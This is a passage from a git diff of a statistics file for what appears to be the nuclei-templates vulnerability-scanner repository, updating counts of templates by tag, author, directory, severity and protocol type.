count":11},{"name":"random_robbie","count":10},{"name":"melbadry9","count":10},{"name":"righettod","count":10},{"name":"nadino","count":10},{"name":"wdahlenb","count":10},{"name":"hackergautam","count":9},{"name":"that_juan_","count":8},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"oppsec","count":7},{"name":"emadshanab","count":7},{"name":"techryptic (@tech)","count":7},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"kophjager007","count":7},{"name":"meme-lord","count":7},{"name":"dogasantos","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"pentest_swissky","count":6},{"name":"caspergn","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"divya_mudgal","count":6},{"name":"logicalhunter","count":6},{"name":"rootxharsh","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"lu4nx","count":5},{"name":"xelkomy","count":5},{"name":"ganofins","count":5},{"name":"iamnoooob","count":5},{"name":"johnk3r","count":5},{"name":"elsfa7110","count":5},{"name":"joanbono","count":5},{"name":"github.com/its0x08","count":4},{"name":"nodauf","count":4},{"name":"incogbyte","count":4},{"name":"e_schultze_","count":4},{"name":"f1tz","count":3},{"name":"vsh00t","count":3},{"name":"z3bd","count":3},{"name":"_generic_human_","count":3},{"name":"0w4ys","count":3},{"name":"skeltavik","count":3},{"name":"shine","count":3},{"name":"fyoorer","count":3},{"name":"sullo","count":3},{"name":"shifacyclewala","count":3},{"name":"thomas_from_offensity","count":3},{"name":"impramodsargar","count":3},{"name":"dudez","count":3},{"name":"emenalf","count":3},{"name":"binaryfigments","count":3},{"name":"jarijaas","count":3},{"name":"tess","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"unstabl3","count":3},{"name":"me9187","count":3},{"name":"johnjhacking","count":3},{"name":"sushantkamble","count":3},{"name":"mavericknerd","count":3},{"name":"idealphase","count":3},{"name":"0xrudra","count":2},{"name":"dheerajmadhukar","count":2},{"name":"vavkamil","count":2},{"name":"bp0lr","count":2},{"name":"bsysop","count":2},{"name":"0xelkomy","count":2},{"name":"moritz nentwig","count":2},{"name":"g4l1t0","count":2},{"name":"convisoappsec","count":2},{"name":"nkxxkn","count":2},{"name":"parth","count":2},{"name":"huowuzhao","count":2},{"name":"whoever","count":2},{"name":"w4cky_","count":2},{"name":"davidmckennirey","count":2},{"name":"kiblyn11","count":2},{"name":"socketz","count":2},{"name":"swissky","count":2},{"name":"0xsmiley","count":2},{"name":"cocxanh","count":2},{"name":"joeldeleep","count":2},{"name":"sy3omda","count":2},{"name":"0xcrypto","count":2},{"name":"mohammedsaneem","count":2},{"name":"manas_harsh","count":2},{"name":"afaq","count":2},{"name":"amsda","count":2},{"name":"koti2","count":2},{"name":"bernardofsr","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"r3naissance","count":2},{"name":"zomsop82","count":2},{"name":"hetroublemakr","count":2},{"name":"gevakun","count":2},{"name":"foulenzer","count":2},{"name":"random-robbie","count":2},{"name":"ree4pwn","count":2},{"name":"0xsapra","count":2},{"name":"gal nagli","count":2},{"name":"hahwul","count":2},{"name":"alifathi-h1","count":2},{"name":"ehsahil","count":2},{"name":"lotusdll","count":2},{"name":"fabaff","count":2},{"name":"r12w4n","count":2},{"name":"arcc","count":2},{"name":"udit_thakkur","count":2},{"name":"bing0o","count":2},{"name":"x1m_martijn","count":2},{"name":"0xprial","count":2},{"name":"pxmme1337","count":2},{"name":"randomrobbie","count":2},{"name":"deena","count":1},{"name":"qlkwej","count":1},{"name":"_harleo","count":1},{"name":"rotemreiss","count":1},{"name":"jteles","count":1},{"name":"x6263","count":1},{"name":"thebinitghimire","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"makyotox","count":1},{"name":"b4uh0lz","count":1},{"name":"schniggie","count":1},{"name":"andysvints","count":1},{"name":"@ofjaaah","count":1},{"name":"b0rn2r00t","count":1},{"name":"daviey","count":1},{"name":"kurohost","count":1},{"name":"intx0x80","count":1},{"name":"sec_hawk","count":1},{"name":"forgedhallpass","count":1},{"name":"shreyapohekar","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"berkdusunur","count":1},{"name":"affix","count":1},{"name":"ilovebinbash","count":1},{"name":"fopina","count":1},{"name":"notsoevilweasel","count":1},{"name":"elmahdi","count":1},{"name":"rodnt","count":1},{"name":"oscarintherocks","count":1},{"name":"push4d","count":1},{"name":"thezakman","count":1},{"name":"droberson","count":1},{"name":"s1r1u5_","count":1},{"name":"kareemse1im","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"juicypotato1","count":1},{"name":"hanlaomo","count":1},{"name":"mhdsamx","count":1},{"name":"akash.c","count":1},{"name":"d0rkerdevil","count":1},{"name":"apt-mirror","count":1},{"name":"revblock","count":1},{"name":"0xrod","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"ipanda","count":1},{"name":"ooooooo_q","count":1},{"name":"omarkurt","count":1},{"name":"wabafet","count":1},{"name":"alperenkesk","count":1},{"name":"adrianmf","count":1},{"name":"naglinagli","count":1},{"name":"chron0x","count":1},{"name":"jeya seelan","count":1},{"name":"ringo","count":1},{"name":"undefl0w","count":1},{"name":"yavolo","count":1},{"name":"pudsec","count":1},{"name":"pratik khalane","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"elder tao","count":1},{"name":"elouhi","count":1},{"name":"kabirsuda","count":1},{"name":"furkansenan","count":1},{"name":"ldionmarcil","count":1},{"name":"mubassirpatel","count":1},{"name":"ahmetpergamum","count":1},{"name":"ohlinge","count":1},{"name":"andirrahmani1","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"lark lab","count":1},{"name":"noamrathaus","count":1},{"name":"akshansh","count":1},{"name":"alph4byt3","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"absshax","count":1},{"name":"dawid-czarnecki","count":1},{"name":"its0x08","count":1},{"name":"jrolf","count":1},{"name":"smaranchand","count":1},{"name":"_darrenmartyn","count":1},{"name":"th3.d1p4k","count":1},{"name":"sicksec","count":1},{"name":"0xd0ff9","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"kre80r","count":1},{"name":"nytr0gen","count":1},{"name":"yashgoti","count":1},{"name":"alex","count":1},{"name":"taielab","count":1},{"name":"patralos","count":1},{"name":"ahmed sherif","count":1},{"name":"mass0ma","count":1},{"name":"0xteles","count":1},{"name":"0ut0fb4nd","count":1},{"name":"philippdelteil","count":1},{"name":"hakluke","count":1},{"name":"borna nematzadeh","count":1},{"name":"xstp","count":1},{"name":"thevillagehacker","count":1},{"name":"orpheus","count":1},{"name":"bad5ect0r","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"pdp","count":1},{"name":"aresx","count":1},{"name":"exploitation","count":1},{"name":"@dwisiswant0","count":1},{"name":"infosecsanyam","count":1},{"name":"defr0ggy","count":1},{"name":"sickwell","count":1},{"name":"zandros0","count":1},{"name":"remonsec","count":1},{"name":"0xtavian","count":1},{"name":"nerrorsec","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"iampritam","count":1},{"name":"tirtha_mandal","count":1},{"name":"co0nan","count":1},{"name":"willd96","count":1},{"name":"gboddin","count":1},{"name":"izn0u","count":1},{"name":"52971","count":1},{"name":"luskabol","count":1},{"name":"retr0","count":1},{"name":"blckraven","count":1},{"name":"bolli95","count":1},{"name":"evolutionsec","count":1},{"name":"clarkvoss","count":1},{"name":"soyelmago","count":1},{"name":"j33n1k4","count":1},{"name":"streetofhackerr007","count":1},{"name":"shelld3v","count":1},{"name":"0h1in9e","count":1},{"name":"rojanrijal","count":1},{"name":"geraldino2","count":1},{"name":"cookiehanhoan","count":1},{"name":"un-fmunozs","count":1},{"name":"petruknisme","count":1},{"name":"udyz","count":1},{"name":"zhenwarx","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"toufik airane","count":1},{"name":"yashanand155","count":1},{"name":"becivells","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"bjhulst","count":1},{"name":"vzamanillo","count":1},{"name":"luci","count":1},{"name":"whynotke","count":1},{"name":"knassar702","count":1},{"name":"manuelbua","count":1},{"name":"mesaglio","count":1},{"name":"c3l3si4n","count":1},{"name":"raesene","count":1},{"name":"regala_","count":1},{"name":"flag007","count":1},{"name":"b0yd","count":1},{"name":"mah3sec_","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"sshell","count":1},{"name":"brabbit10","count":1},{"name":"tim_koopmans","count":1},{"name":"micha3lb3n","count":1},{"name":"shifacyclewla","count":1},{"name":"_c0wb0y_","count":1},{"name":"fmunozs","count":1},{"name":"nvn1729","count":1},{"name":"ajaysenr","count":1}],"directory":[{"name":"cves","count":831},{"name":"vulnerabilities","count":324},{"name":"exposed-panels","count":264},{"name":"technologies","count":201},{"name":"exposures","count":191},{"name":"misconfiguration","count":139},{"name":"takeovers","count":65},{"name":"token-spray","count":63},{"name":"default-logins","count":60},{"name":"file","count":50},{"name":"workflows","count":38},{"name":"network","count":32},{"name":"iot","count":27},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":743},{"name":"high","count":641},{"name":"medium","count":474},{"name":"critical","count":294},{"name":"low","count":155}],"types":[{"name":"http","count":2195},{"name":"file","count":50},{"name":"network","count":45},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 49c6906b75..7e62861261 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,917 +1,925 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 818 | daffainfo | 285 | cves | 821 | info | 733 | http | 2164 | -| lfi | 330 | pikpikcu | 279 | vulnerabilities | 316 | high | 632 | file | 49 | -| panel | 259 | dhiyaneshdk | 268 | exposed-panels | 255 | medium | 471 | network | 45 | -| xss | 256 | pdteam | 201 | technologies | 201 | critical | 284 | dns | 12 | -| wordpress | 245 | geeknik | 159 | exposures | 191 | low | 155 | | | -| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 137 | | | | | -| rce | 204 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 193 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 170 | princechaddha | 64 | default-logins | 58 | | | | | -| cve2020 | 164 | madrobot | 63 | file | 49 | | | | | -| cve2021 | 151 | zzeitlin | 63 | workflows | 37 | | | | | -| joomla | 128 | 0x_akoko | 46 | network | 32 | | | | | +| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 | +| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 | +| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 | +| xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | +| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | | +| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | | +| rce | 212 | gy741 | 81 | takeovers | 65 | | | | | +| tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | | +| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | +| cve2020 | 164 | madrobot | 63 | file | 50 | | | | | +| cve2021 | 155 | zzeitlin | 63 | workflows | 38 | | | | | +| joomla | 128 | 0x_akoko | 50 | network | 32 | | | | | | cve2010 | 109 | gaurang | 42 | iot | 27 | | | | | -| cve2019 | 97 | philippedelteil | 27 | miscellaneous | 24 | | | | | +| cve2019 | 97 | philippedelteil | 29 | miscellaneous | 24 | | | | | | config | 95 | ice3man | 26 | dns | 12 | | | | | -| cve2018 | 87 | organiccrap | 24 | fuzzing | 10 | | | | | +| cve2018 | 88 | organiccrap | 24 | fuzzing | 10 | | | | | | apache | 73 | sheikhrishad | 15 | cnvd | 9 | | | | | | takeover | 69 | pr3r00t | 15 | headless | 5 | | | | | -| iot | 68 | milo2012 | 14 | | | | | | | -| token | 67 | techbrunchfr | 13 | | | | | | | -| default-login | 66 | suman_kar | 12 | | | | | | | +| default-login | 68 | milo2012 | 14 | | | | | | | +| oob | 68 | techbrunchfr | 13 | | | | | | | +| iot | 68 | suman_kar | 12 | | | | | | | +| token | 67 | cyllective | 11 | | | | | | | | token-spray | 63 | r3dg33k | 11 | | | | | | | -| oob | 59 | cyllective | 11 | | | | | | | -| cve2017 | 50 | random_robbie | 10 | | | | | | | -| file | 49 | nadino | 10 | | | | | | | -| unauth | 47 | wdahlenb | 10 | | | | | | | -| network | 43 | righettod | 10 | | | | | | | -| sqli | 40 | melbadry9 | 10 | | | | | | | -| ssrf | 40 | hackergautam | 9 | | | | | | | -| redirect | 37 | that_juan_ | 8 | | | | | | | -| cve2016 | 37 | iamthefrogy | 8 | | | | | | | -| | 37 | aashiq | 8 | | | | | | | -| oracle | 36 | dogasantos | 7 | | | | | | | -| logs | 30 | harshbothra_ | 7 | | | | | | | -| google | 29 | techryptic (@tech) | 7 | | | | | | | -| jira | 28 | meme-lord | 7 | | | | | | | -| atlassian | 27 | randomstr1ng | 7 | | | | | | | -| listing | 27 | emadshanab | 7 | | | | | | | -| cve2014 | 27 | 0x240x23elu | 7 | | | | | | | -| cve2015 | 26 | kophjager007 | 7 | | | | | | | +| cve2017 | 51 | wdahlenb | 10 | | | | | | | +| file | 50 | nadino | 10 | | | | | | | +| unauth | 49 | melbadry9 | 10 | | | | | | | +| network | 43 | random_robbie | 10 | | | | | | | +| ssrf | 41 | righettod | 10 | | | | | | | +| sqli | 40 | hackergautam | 9 | | | | | | | +| | 38 | aashiq | 8 | | | | | | | +| cve2016 | 37 | that_juan_ | 8 | | | | | | | +| redirect | 37 | zh | 8 | | | | | | | +| oracle | 36 | iamthefrogy | 8 | | | | | | | +| logs | 30 | dr_set | 7 | | | | | | | +| google | 30 | emadshanab | 7 | | | | | | | +| jira | 28 | 0x240x23elu | 7 | | | | | | | +| atlassian | 28 | dogasantos | 7 | | | | | | | +| cve2015 | 28 | techryptic (@tech) | 7 | | | | | | | +| cisco | 27 | randomstr1ng | 7 | | | | | | | +| listing | 27 | kophjager007 | 7 | | | | | | | +| cve2014 | 27 | harshbothra_ | 7 | | | | | | | | generic | 24 | oppsec | 7 | | | | | | | -| disclosure | 23 | dr_set | 7 | | | | | | | -| misc | 23 | __fazal | 6 | | | | | | | -| auth-bypass | 23 | puzzlepeaches | 6 | | | | | | | -| cisco | 22 | logicalhunter | 6 | | | | | | | -| router | 21 | caspergn | 6 | | | | | | | +| misc | 23 | meme-lord | 7 | | | | | | | +| disclosure | 23 | puzzlepeaches | 6 | | | | | | | +| auth-bypass | 23 | logicalhunter | 6 | | | | | | | +| router | 21 | divya_mudgal | 6 | | | | | | | | misconfig | 20 | pentest_swissky | 6 | | | | | | | -| aem | 19 | yanyun | 5 | | | | | | | -| debug | 18 | ganofins | 5 | | | | | | | -| springboot | 18 | rootxharsh | 5 | | | | | | | -| cve2012 | 18 | joanbono | 5 | | | | | | | -| sap | 18 | johnk3r | 5 | | | | | | | -| php | 16 | iamnoooob | 5 | | | | | | | -| cve2011 | 15 | xelkomy | 5 | | | | | | | -| fuzz | 14 | panch0r3d | 5 | | | | | | | -| cve2009 | 14 | lu4nx | 5 | | | | | | | -| struts | 14 | elsfa7110 | 5 | | | | | | | -| aws | 14 | e_schultze_ | 4 | | | | | | | -| login | 14 | nodauf | 4 | | | | | | | -| weblogic | 14 | github.com/its0x08 | 4 | | | | | | | -| android | 13 | incogbyte | 4 | | | | | | | -| zoho | 13 | sullo | 3 | | | | | | | -| dns | 13 | tess | 3 | | | | | | | -| adobe | 13 | mavericknerd | 3 | | | | | | | -| devops | 13 | f1tz | 3 | | | | | | | -| jenkins | 12 | yash anand @yashanand155 | 3 | | | | | | | -| dlink | 12 | 0w4ys | 3 | | | | | | | -| manageengine | 12 | emenalf | 3 | | | | | | | -| wp-theme | 11 | shifacyclewala | 3 | | | | | | | -| cve2013 | 11 | binaryfigments | 3 | | | | | | | -| dell | 10 | shine | 3 | | | | | | | -| xxe | 10 | unstabl3 | 3 | | | | | | | -| intrusive | 10 | idealphase | 3 | | | | | | | -| ftp | 9 | _generic_human_ | 3 | | | | | | | -| magento | 9 | z3bd | 3 | | | | | | | -| vmware | 9 | impramodsargar | 3 | | | | | | | -| airflow | 8 | skeltavik | 3 | | | | | | | -| ruijie | 8 | thomas_from_offensity | 3 | | | | | | | -| backup | 8 | vsh00t | 3 | | | | | | | -| nginx | 8 | jarijaas | 3 | | | | | | | -| scada | 8 | sushantkamble | 3 | | | | | | | -| ibm | 8 | fyoorer | 3 | | | | | | | -| rails | 8 | dudez | 3 | | | | | | | -| gitlab | 8 | sy3omda | 2 | | | | | | | -| cve2008 | 8 | alifathi-h1 | 2 | | | | | | | -| cnvd | 8 | mohammedsaneem | 2 | | | | | | | -| microsoft | 8 | me9187 | 2 | | | | | | | -| netgear | 7 | convisoappsec | 2 | | | | | | | -| coldfusion | 7 | g4l1t0 | 2 | | | | | | | -| cms | 7 | randomrobbie | 2 | | | | | | | -| kubernetes | 7 | vavkamil | 2 | | | | | | | -| hp | 7 | ree4pwn | 2 | | | | | | | -| files | 7 | nkxxkn | 2 | | | | | | | -| confluence | 7 | lotusdll | 2 | | | | | | | -| docker | 6 | udit_thakkur | 2 | | | | | | | -| rconfig | 6 | bsysop | 2 | | | | | | | -| citrix | 6 | 0xsmiley | 2 | | | | | | | -| fileupload | 6 | 0xsapra | 2 | | | | | | | -| laravel | 6 | hahwul | 2 | | | | | | | -| api | 6 | r12w4n | 2 | | | | | | | -| nodejs | 6 | afaq | 2 | | | | | | | -| django | 6 | 0xrudra | 2 | | | | | | | -| solr | 6 | cocxanh | 2 | | | | | | | -| camera | 6 | joeldeleep | 2 | | | | | | | -| lucee | 6 | johnjhacking | 2 | | | | | | | -| jetty | 6 | ehsahil | 2 | | | | | | | -| tomcat | 5 | pxmme1337 | 2 | | | | | | | -| printer | 5 | arcc | 2 | | | | | | | -| ssti | 5 | random-robbie | 2 | | | | | | | -| java | 5 | davidmckennirey | 2 | | | | | | | -| windows | 5 | huowuzhao | 2 | | | | | | | -| crlf | 5 | whoever | 2 | | | | | | | +| aem | 19 | caspergn | 6 | | | | | | | +| sap | 18 | __fazal | 6 | | | | | | | +| cve2012 | 18 | ganofins | 5 | | | | | | | +| debug | 18 | rootxharsh | 5 | | | | | | | +| springboot | 18 | lu4nx | 5 | | | | | | | +| php | 16 | xelkomy | 5 | | | | | | | +| cve2011 | 15 | yanyun | 5 | | | | | | | +| devops | 15 | johnk3r | 5 | | | | | | | +| weblogic | 14 | iamnoooob | 5 | | | | | | | +| login | 14 | elsfa7110 | 5 | | | | | | | +| struts | 14 | joanbono | 5 | | | | | | | +| cve2009 | 14 | panch0r3d | 5 | | | | | | | +| fuzz | 14 | e_schultze_ | 4 | | | | | | | +| aws | 14 | github.com/its0x08 | 4 | | | | | | | +| deserialization | 13 | incogbyte | 4 | | | | | | | +| zoho | 13 | nodauf | 4 | | | | | | | +| dns | 13 | johnjhacking | 3 | | | | | | | +| android | 13 | fyoorer | 3 | | | | | | | +| adobe | 13 | emenalf | 3 | | | | | | | +| manageengine | 12 | thomas_from_offensity | 3 | | | | | | | +| dlink | 12 | f1tz | 3 | | | | | | | +| wp-theme | 12 | jarijaas | 3 | | | | | | | +| jenkins | 12 | impramodsargar | 3 | | | | | | | +| magento | 11 | yash anand @yashanand155 | 3 | | | | | | | +| cve2013 | 11 | _generic_human_ | 3 | | | | | | | +| intrusive | 10 | binaryfigments | 3 | | | | | | | +| xxe | 10 | tess | 3 | | | | | | | +| dell | 10 | 0w4ys | 3 | | | | | | | +| hp | 10 | unstabl3 | 3 | | | | | | | +| vmware | 9 | dudez | 3 | | | | | | | +| kubernetes | 9 | shine | 3 | | | | | | | +| ftp | 9 | vsh00t | 3 | | | | | | | +| gitlab | 8 | mavericknerd | 3 | | | | | | | +| cve2008 | 8 | sushantkamble | 3 | | | | | | | +| backup | 8 | me9187 | 3 | | | | | | | +| scada | 8 | sullo | 3 | | | | | | | +| rails | 8 | z3bd | 3 | | | | | | | +| ibm | 8 | shifacyclewala | 3 | | | | | | | +| ruijie | 8 | skeltavik | 3 | | | | | | | +| cnvd | 8 | idealphase | 3 | | | | | | | +| nginx | 8 | bp0lr | 2 | | | | | | | +| airflow | 8 | 0xrudra | 2 | | | | | | | +| microsoft | 8 | socketz | 2 | | | | | | | +| fastjson | 8 | g4l1t0 | 2 | | | | | | | +| netgear | 7 | 0xsapra | 2 | | | | | | | +| cms | 7 | w4cky_ | 2 | | | | | | | +| confluence | 7 | udit_thakkur | 2 | | | | | | | +| coldfusion | 7 | bernardofsr | 2 | | | | | | | +| files | 7 | arcc | 2 | | | | | | | +| drupal | 6 | r3naissance | 2 | | | | | | | +| jetty | 6 | 0xelkomy | 2 | | | | | | | +| laravel | 6 | parth | 2 | | | | | | | +| docker | 6 | 0xsmiley | 2 | | | | | | | +| nodejs | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| solr | 6 | pxmme1337 | 2 | | | | | | | +| lucee | 6 | dheerajmadhukar | 2 | | | | | | | +| rconfig | 6 | koti2 | 2 | | | | | | | +| django | 6 | hetroublemakr | 2 | | | | | | | +| fileupload | 6 | davidmckennirey | 2 | | | | | | | +| api | 6 | huowuzhao | 2 | | | | | | | +| camera | 6 | vavkamil | 2 | | | | | | | +| citrix | 6 | amsda | 2 | | | | | | | +| windows | 5 | mohammedsaneem | 2 | | | | | | | +| jolokia | 5 | fabaff | 2 | | | | | | | +| ssti | 5 | sy3omda | 2 | | | | | | | +| iis | 5 | cocxanh | 2 | | | | | | | +| tomcat | 5 | foulenzer | 2 | | | | | | | +| java | 5 | r12w4n | 2 | | | | | | | +| phpmyadmin | 5 | hahwul | 2 | | | | | | | +| printer | 5 | whoever | 2 | | | | | | | | dedecms | 5 | x1m_martijn | 2 | | | | | | | -| phpmyadmin | 5 | dheerajmadhukar | 2 | | | | | | | -| iis | 5 | fabaff | 2 | | | | | | | -| headless | 5 | 0xcrypto | 2 | | | | | | | -| circarlife | 5 | manas_harsh | 2 | | | | | | | -| jolokia | 5 | moritz nentwig | 2 | | | | | | | -| drupal | 5 | zomsop82 | 2 | | | | | | | -| deserialization | 5 | kiblyn11 | 2 | | | | | | | -| firmware | 4 | socketz | 2 | | | | | | | -| zimbra | 4 | bp0lr | 2 | | | | | | | -| proxy | 4 | gal nagli | 2 | | | | | | | -| wso2 | 4 | gevakun | 2 | | | | | | | -| zabbix | 4 | bernardofsr | 2 | | | | | | | -| elastic | 4 | r3naissance | 2 | | | | | | | -| glpi | 4 | koti2 | 2 | | | | | | | -| thinkphp | 4 | hetroublemakr | 2 | | | | | | | -| thinkcmf | 4 | amsda | 2 | | | | | | | -| traversal | 4 | parth | 2 | | | | | | | -| symfony | 4 | bing0o | 2 | | | | | | | -| vpn | 4 | 0xelkomy | 2 | | | | | | | -| firebase | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| rfi | 4 | w4cky_ | 2 | | | | | | | -| exchange | 4 | foulenzer | 2 | | | | | | | -| asp | 4 | 0xprial | 2 | | | | | | | -| npm | 4 | swissky | 2 | | | | | | | -| amazon | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| hongdian | 4 | exploitation | 1 | | | | | | | -| symantec | 4 | sickwell | 1 | | | | | | | -| buffalo | 4 | 0xtavian | 1 | | | | | | | -| magmi | 4 | qlkwej | 1 | | | | | | | -| slack | 4 | philippdelteil | 1 | | | | | | | -| grafana | 4 | gboddin | 1 | | | | | | | -| maps | 4 | mubassirpatel | 1 | | | | | | | -| webserver | 4 | toufik airane | 1 | | | | | | | -| strapi | 4 | bolli95 | 1 | | | | | | | -| moodle | 4 | izn0u | 1 | | | | | | | -| artifactory | 4 | dawid-czarnecki | 1 | | | | | | | -| fatpipe | 4 | juicypotato1 | 1 | | | | | | | -| git | 4 | ringo | 1 | | | | | | | -| samsung | 4 | alex | 1 | | | | | | | -| solarwinds | 4 | 0ut0fb4nd | 1 | | | | | | | -| resin | 4 | ohlinge | 1 | | | | | | | -| backdoor | 3 | b0rn2r00t | 1 | | | | | | | -| mongodb | 3 | kabirsuda | 1 | | | | | | | -| node | 3 | mesaglio | 1 | | | | | | | -| druid | 3 | makyotox | 1 | | | | | | | -| opensis | 3 | pudsec | 1 | | | | | | | -| ssh | 3 | 52971 | 1 | | | | | | | -| prometheus | 3 | elder tao | 1 | | | | | | | -| telerik | 3 | sshell | 1 | | | | | | | -| nosqli | 3 | brabbit10 | 1 | | | | | | | -| fpd | 3 | mah3sec_ | 1 | | | | | | | -| ebs | 3 | ahmed sherif | 1 | | | | | | | -| httpd | 3 | whynotke | 1 | | | | | | | -| oa | 3 | retr0 | 1 | | | | | | | -| jellyfin | 3 | ajaysenr | 1 | | | | | | | -| injection | 3 | sicksec | 1 | | | | | | | -| nacos | 3 | oscarintherocks | 1 | | | | | | | -| terramaster | 3 | x6263 | 1 | | | | | | | -| tikiwiki | 3 | yashgoti | 1 | | | | | | | -| openam | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| targa | 3 | tim_koopmans | 1 | | | | | | | -| cve2007 | 3 | aaron_costello | 1 | | | | | | | +| crlf | 5 | gevakun | 2 | | | | | | | +| headless | 5 | kiblyn11 | 2 | | | | | | | +| circarlife | 5 | joeldeleep | 2 | | | | | | | +| solarwinds | 4 | 0xprial | 2 | | | | | | | +| thinkphp | 4 | afaq | 2 | | | | | | | +| npm | 4 | ree4pwn | 2 | | | | | | | +| strapi | 4 | gal nagli | 2 | | | | | | | +| resin | 4 | randomrobbie | 2 | | | | | | | +| thinkcmf | 4 | manas_harsh | 2 | | | | | | | +| grafana | 4 | nkxxkn | 2 | | | | | | | +| webserver | 4 | zomsop82 | 2 | | | | | | | +| hongdian | 4 | 0xcrypto | 2 | | | | | | | +| fatpipe | 4 | random-robbie | 2 | | | | | | | +| elastic | 4 | bsysop | 2 | | | | | | | +| maps | 4 | moritz nentwig | 2 | | | | | | | +| exchange | 4 | alifathi-h1 | 2 | | | | | | | +| traversal | 4 | swissky | 2 | | | | | | | +| firmware | 4 | bing0o | 2 | | | | | | | +| rfi | 4 | convisoappsec | 2 | | | | | | | +| samsung | 4 | lotusdll | 2 | | | | | | | +| symantec | 4 | ehsahil | 2 | | | | | | | +| amazon | 4 | mubassirpatel | 1 | | | | | | | +| symfony | 4 | smaranchand | 1 | | | | | | | +| zabbix | 4 | omarkurt | 1 | | | | | | | +| wso2 | 4 | thevillagehacker | 1 | | | | | | | +| asp | 4 | mhdsamx | 1 | | | | | | | +| glpi | 4 | micha3lb3n | 1 | | | | | | | +| firebase | 4 | taielab | 1 | | | | | | | +| zimbra | 4 | luskabol | 1 | | | | | | | +| vpn | 4 | iampritam | 1 | | | | | | | +| git | 4 | hanlaomo | 1 | | | | | | | +| artifactory | 4 | ohlinge | 1 | | | | | | | +| slack | 4 | regala_ | 1 | | | | | | | +| buffalo | 4 | petruknisme | 1 | | | | | | | +| magmi | 4 | j33n1k4 | 1 | | | | | | | +| proxy | 4 | tirtha_mandal | 1 | | | | | | | +| moodle | 4 | 0ut0fb4nd | 1 | | | | | | | +| fpd | 3 | aceseven (digisec360) | 1 | | | | | | | +| nosqli | 3 | soyelmago | 1 | | | | | | | +| jeesns | 3 | 0xteles | 1 | | | | | | | +| caucho | 3 | wabafet | 1 | | | | | | | +| openam | 3 | evolutionsec | 1 | | | | | | | +| tikiwiki | 3 | udyz | 1 | | | | | | | +| terramaster | 3 | yashgoti | 1 | | | | | | | +| springcloud | 3 | akash.c | 1 | | | | | | | +| ebs | 3 | alperenkesk | 1 | | | | | | | +| lansweeper | 3 | dawid-czarnecki | 1 | | | | | | | +| cacti | 3 | kba@sogeti_esec | 1 | | | | | | | +| telerik | 3 | fmunozs | 1 | | | | | | | +| exposures | 3 | naglinagli | 1 | | | | | | | +| lfr | 3 | elder tao | 1 | | | | | | | +| prometheus | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| vbulletin | 3 | sec_hawk | 1 | | | | | | | +| httpd | 3 | elouhi | 1 | | | | | | | +| smtp | 3 | alex | 1 | | | | | | | +| fanruan | 3 | pudsec | 1 | | | | | | | +| itop | 3 | jrolf | 1 | | | | | | | +| cve2007 | 3 | qlkwej | 1 | | | | | | | +| kevinlab | 3 | co0nan | 1 | | | | | | | +| mail | 3 | oscarintherocks | 1 | | | | | | | +| backdoor | 3 | manuelbua | 1 | | | | | | | +| ofbiz | 3 | affix | 1 | | | | | | | +| r-seenet | 3 | vzamanillo | 1 | | | | | | | +| opensis | 3 | noamrathaus | 1 | | | | | | | +| kafka | 3 | @dwisiswant0 | 1 | | | | | | | +| openssh | 3 | un-fmunozs | 1 | | | | | | | +| cloud | 3 | notsoevilweasel | 1 | | | | | | | +| github | 3 | andirrahmani1 | 1 | | | | | | | +| jellyfin | 3 | shelld3v | 1 | | | | | | | +| search | 3 | bad5ect0r | 1 | | | | | | | +| hoteldruid | 3 | nytr0gen | 1 | | | | | | | +| log | 3 | its0x08 | 1 | | | | | | | +| druid | 3 | mesaglio | 1 | | | | | | | +| linkerd | 3 | 52971 | 1 | | | | | | | +| targa | 3 | ratnadip gajbhiye | 1 | | | | | | | +| nacos | 3 | flag007 | 1 | | | | | | | +| microstrategy | 3 | mass0ma | 1 | | | | | | | +| node | 3 | deena | 1 | | | | | | | +| injection | 3 | 